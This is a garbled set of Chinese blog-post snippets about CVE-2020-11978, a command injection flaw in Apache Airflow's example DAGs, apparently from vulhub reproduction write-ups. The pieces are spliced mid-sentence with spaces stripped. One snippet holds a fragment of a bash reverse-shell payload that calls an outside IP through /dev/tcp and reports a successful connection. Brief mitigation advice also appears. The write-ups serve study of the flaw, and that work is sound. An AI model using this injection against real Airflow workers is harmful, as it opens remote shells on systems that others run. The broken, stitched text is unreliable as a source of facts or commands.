ApacheAirflow是一款开源的，分布式任务调度框架。在其1.10.10版本及以前的示例DAG中存在一处命令注入漏洞，未授权的访问者可以通过这个漏洞在Worker中执行任意命令。参考链接：https://lists.apache.org/thread/cn57zwylxsnzjyjztwqxpmly0x9q5ljxhttps://github.com/pberba/CVE-2020-1197

目录一、漏洞信息二、环境搭建三、复现过程四、修复建议一、漏洞信息漏洞名称APACHEAIRFLOWCELERY消息中间件命令执行漏洞漏洞编号CVE-2020-11978危害等级高危CVSS评分7.5漏洞厂商

ApacheAirflow示例dag中的命令注入(CVE-2020-11978)0x01漏洞简介Airflow是一个使用python语言编写的datapipeline调度和监控工作流的平台。

菜就得多学习环境：vulhubApacheAirflow是一款开源的，分布式任务调度框架。在其1.10.10版本及以前的示例DAG中存在一处命令注入漏洞，未授权的访问者可以通过这个漏洞在Worker中执行任意命令。根据vulhub文档需要依次执行如下命令启动airflow1.10.10：#初始化数据库docker-composerunairflow-init#启动服务docker-composeu

简介漏洞软件：ApacheAirflow影响版本：&/dev/tcp/10.10.1.7/66660>&1;#"}连接成功缓解升级到1.10.10版本之后删除或者禁用DAG，可自行删除或在配置文件中禁用默认DAGload_examples=False参考Vulhub漏洞环境详情：https://vulmon.com/vulnerabilitydetails?qid=CVE-2020-11978&s

文章目录博主介绍一、漏洞编号二、影响范围三、漏洞描述四、环境搭建1、进入CVE-2020-11978环境2、启动CVE-2

文章目录一、ApacheAirflow简介二、漏洞成因example_trigger_controller_dag和example_trigger_target_dag分析1、example_trigger_controller_dag2、example_trigger_target_dag三、漏洞复现一、ApacheAirflow简介ApacheAirflow是python语言编写的一个以编程方